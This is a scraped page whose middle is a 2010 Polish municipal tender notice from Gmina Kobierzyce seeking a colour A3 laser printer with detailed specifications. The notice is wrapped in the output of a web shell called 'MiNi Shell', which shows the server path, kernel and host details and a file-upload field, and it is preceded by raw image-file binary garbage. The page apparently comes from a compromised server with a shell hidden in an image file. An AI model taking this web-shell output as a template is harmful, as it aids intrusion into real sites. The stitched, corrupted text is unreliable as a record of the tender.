JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101008/279349-N-2010.html

<p class="kh_header"><b>Kobierzyce: Dostawa drukarki laserowej, kolorowej A3 z sieciowym serwerem drukowania i automatycznym drukiem dwustronnym</b><br>
<b>Numer ogłoszenia: 279349 - 2010; data zamieszczenia: 08.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kobierzyce , al. Pałacowa 1, 55-040 Kobierzyce, woj. dolnośląskie, tel. 071 3111215, faks 071 3111252.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa drukarki laserowej, kolorowej A3 z sieciowym serwerem drukowania i automatycznym drukiem dwustronnym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa drukarki laserowej, kolorowej A3 z sieciowym serwerem drukowania i automatycznym drukiem dwustronnym dla potrzeb Urzędu Gminy w Kobierzycach.

Wymagania:

1.	Urządzenie musi być nowe.
2.	Technologia: druk laserowy kolorowy jednoprzebiegowy.
3.	Maksymalna szybkość drukowania w czerni, na papierze A4 (tryb normalny, nie uproszczony, ani ekonomiczny), nie mniejsza niż 18 stron na minutę.
4.	Maksymalna szybkość drukowania w kolorze, na papierze A4 (tryb normalny, nie uproszczony, ani ekonomiczny), nie mniejsza niż 18 stron na minutę.
5.	Wydruk pierwszej strony w kolorze (format A4, po wyjściu ze stanu gotowości) - nie później niż po 20 sekundach
6.	Maksymalna rozdzielczość przy drukowaniu w czerni - nie mniejsza niż 600x600 dpi (w obu kierunkach musi być co najmniej 600 dpi)
7.	Maksymalna rozdzielczość przy drukowaniu w kolorze - nie mniejsza niż 600x600 dpi (w obu kierunkach musi być co najmniej 600 dpi)
8.	Zalecana ilość stron drukowanych miesięcznie (górna granica przedziału zalecanego obciążenia urządzenia) nie mniejsza niż 5000 stron/miesiąc 
9.	Marginesy wydruku (najmniejsza odległość obszaru zadrukowanego od krawędzi arkusza) dla każdej krawędzi arkusza - nie większe niż 4,5 mm 
10.	Pamięć drukarki minimum 300 MB.
11.	Szybkość procesora drukarki - minimum 500 MHz
12.	Ilość podajników papieru - minimum 3 o następujących cechach:
- co najmniej dwa podajniki powinny mieć pojemność minimum 250 arkuszy o jednym ze standardowych formatów A3, A4, B4, B5 lub o niestandardowym rozmiarze od 148x210 do 297x420
 co najmniej jeden podajnik powinien mieć pojemność minimum 500 arkuszy o jednym ze standardowych formatów A3, A4, B4, B5 lub o niestandardowym rozmiarze od 148x210 do 297x420
- przynajmniej jeden z podajników powinien akceptować  papier (lub inne nośniki wydruku - np. folie do drukarek laserowych) w każdym formacie z następującej listy: A3, A4, A5, A6, RA3, SRA3, B4, B5, 10x15 cm; koperty (DL, C5, B5)  
- przynajmniej jeden z podajników powinien akceptować nietypowe rozmiary papieru (lub innych nośników wydruku - np. folii do drukarek laserowych) - pozwalając na drukowanie na nośnikach o rozmiarze od 76x127 mm do 297x420mm
- Przynajmniej jeden podajnik urządzenia musi pozwalać na drukowanie na papierze o zakresie gramatury od 60 do 220 g m2
13.	Odbiornik wydruków o pojemności minimum 250 arkuszy
14.	Wbudowana funkcjonalność sprzętowego, automatycznego druku dwustronnego dostępna jako opcja z poziomu sterownika drukarki pod systemami operacyjnymi Microsoft Windows XP 2003 7 
15.	Drukarka musi posiadać sieciowy serwer wydruku pozwalający na wysyłanie na nią wydruków za pośrednictwem sieci ethernet  z komputerów PC pracujących w tej sieci. Połączenie z siecią powinno być realizowane z wykorzystaniem protokołów TCP-IP, z szybkością 100 MBit s lub 1000 MBit s.
16.	Drukarka powinna mieć interfejs komunikacyjny USB 2.0 pozwalający na szybkie przesyłanie nim wydruków z bezpośrednio podłączonego do drukarki komputera
17.	Serwer wydruku powinien mieć zdalny panel administracyjny osiągalny za pomocą przeglądarki internetowej (po wpisaniu w niej adresu IP zgodnego z adresem przydzielonym drukarce).
18.	Pobór mocy przez urządzenie włączone nie przekraczający 500W
19.	Pobór mocy w trybie gotowości nie przekraczający 50W
20.	Pobór mocy urządzenia w stanie uśpienia nie większy niz 5W
21.	Masa drukarki nie przekraczająca 60kg
22.	Maksymalna wysokość drukarki 60 cm (zostanie umieszczona na blacie biurka - panel obsługowy nie może znaleźć się zbyt wysoko dla osób o niższym wzroście) 
23.	Urządzenie musi posiadać certyfikat kompatybilności elektromagnetycznej (znak CE) 
24.	Producent drukarki musi mieć swój serwis na terenie Polski.
25.	Drukarka powinna mieć 12 miesięczną gwarancję producenta
26.	Drukarka powinna być dostarczona z zagwarantowaną 5 letnią opieką serwisową producenta sprzętu.  Opieka ta powinna zapewniać usunięcie awarii urządzenia w ciągu 24 godzin lub podstawienie urządzenia zastępczego (w tym samym czasie). W ramach usługi serwisowej wszelkie koszty w szczególności związane z usunięciem awarii (robocizna, ewentualna wymiana części itp.), koszty transportu, ewentualne koszty dostarczenia urządzenia zastępczego, wliczone są w cenę wynagrodzenia umownego i Zamawiający nie będzie ponosił z tego tytułu żadnych dodatkowych opłat. Jeżeli obsługa logistyczna serwisu drukarki (jej diagnostyka, transport do i z serwisu drukarki zepsutej/naprawionej/zastępczej, koszt kurierów itp.) nie mieści się w zakupionych opcjach serwisowych producenta ewentualne dodatkowe koszty z tego tytułu ponosić będzie wykonawca.
27.	Drukarkę należy dostarczyć z dobrej jakości kablem połączeniowym USB o długości minimum 3m (grubym - gwarantującym poprawną współpracę drukarki z komputerem)
28.	Niezależnie od ilości tonerów stanowiących standardową zawartość opakowania z drukarką (oczywiście jeżeli takie tonery występują dla danego modelu drukarki), drukarka musi być dostarczona z dodatkowymi tonerami zapewniającymi wydrukowanie z ich wykorzystaniem, nie mniej niż 20 000 stron zadrukowanych w kolorze czarnym i nie mniej niż 20 000 stron kolorowych. Spełnienie tego wymagania oznacza, że ilość każdego typu tonera pomnożona przez jego nominalną wydajność (wyznaczaną zgodnie z normą ISO IEC 19798) musi być większa niż 20 000. Jakkolwiek wybrana zostanie oferta najkorzystniejsza cenowo to cena brutto tych dodatkowych tonerów musi być wyszczególniona w ofercie ponieważ na ich zakup Zamawiający przeznaczy środki z innego paragrafu budżetowego . 
29.	Dostarczone dodatkowe tonery muszą być nowe (nie napełniane regenerowane itp), nie mogą naruszać praw patentowych producenta drukarki ani innych firm i muszą spełniać wszelkie, zgodne z polskim prawem, wymagania producenta odnośnie jakości materiałów eksploatacyjnych i nie mogą naruszać warunków gwarancji i świadczenia przez producenta urządzenia 5 letniej opieki serwisowej. Ewentualne zakwestionowanie dostarczonych tonerów, przez producenta, uniemożliwiające wyegzekwowanie zamówionego serwisu będzie automatycznie obligowało Wykonawcę do rozwiązania takiego problemu w czasie nie przekraczającym 7 dni od daty zgłoszenia takiej sytuacji przez Zamawiającego. W takiej sytuacji Wykonawca poniesie koszty niezbędnej diagnostyki, napraw, transportu urządzenia, nowych zgodnych z wymaganiami producenta tonerów i wymagających wymiany części i pełnego odzyskania dalszej opieki producenta nad urządzeniem.   
30.	Modelem referencyjnym, z naddatkiem spełniającym wymagania jest drukarka HP LaserJet Color 5225dn z rozszerzoną (o 128 MB) pamięcią, dodatkowym podajnikiem papieru na 500 arkuszy i opcją 5 letniej opieki serwisowej producenta. 
31.	Wszelkie nazwy własne produktów oraz materiałów użyte w treści SIWZ i załacznikach należy traktować jako określenie parametrów technicznych i jakościowych oraz czytać jako takie lub równoważne. Nazwy własne produktów służą określeniu pożądanego standardu dostawy i określeniu właściwości i wymogów technicznych drukarki..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zlecenie realizacji ewentualnych zamówień uzupełniających, stanowiących nie więcej niż 20 procent wartości zamówienia podstawowego nastąpi zgodnie z art. 67 ust 1 pkt 7 PzpU.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> n/d</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający, na podstawie złożonych przez Wykonawcę dokumentów, dokona oceny spełniania warunków według formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.  Zamawiający zawiadamia niezwłocznie Wykonawcę o wykluczeniu z postępowania  o udzielenie za?mówienia, podając uzasadnienie faktyczne i prawne</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie; realizacji dostaw drukarek (zbieżnych z przedmiotem zamówienia) oraz załączeniem dokumentów (referencji) potwierdzających, że ww. dostawy  zostały wykonane należycie (wymagane minimum to przedstawienie minimum jednej referencji na dostawę drukarek)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej obejmującej przedmiot zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowana dostawa odpowiada wymaganiom określonym przez Zamawiającego, Wykonawca winien załączyć do oferty przetargowej:
szczegółowy opis techniczny wraz z parametrami oferowanego przedmiotu (w języku polskim)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zgodnie z pkt XV SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kobierzyce, Al. Pałacowa 1, 55-040 Kobierzyce, pok 50.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2010 godzina 12:00, miejsce: Urząd Gminy Kobierzyce, Al. Pałacowa 1, 55-040 Kobierzyce, pok 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> n/d.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com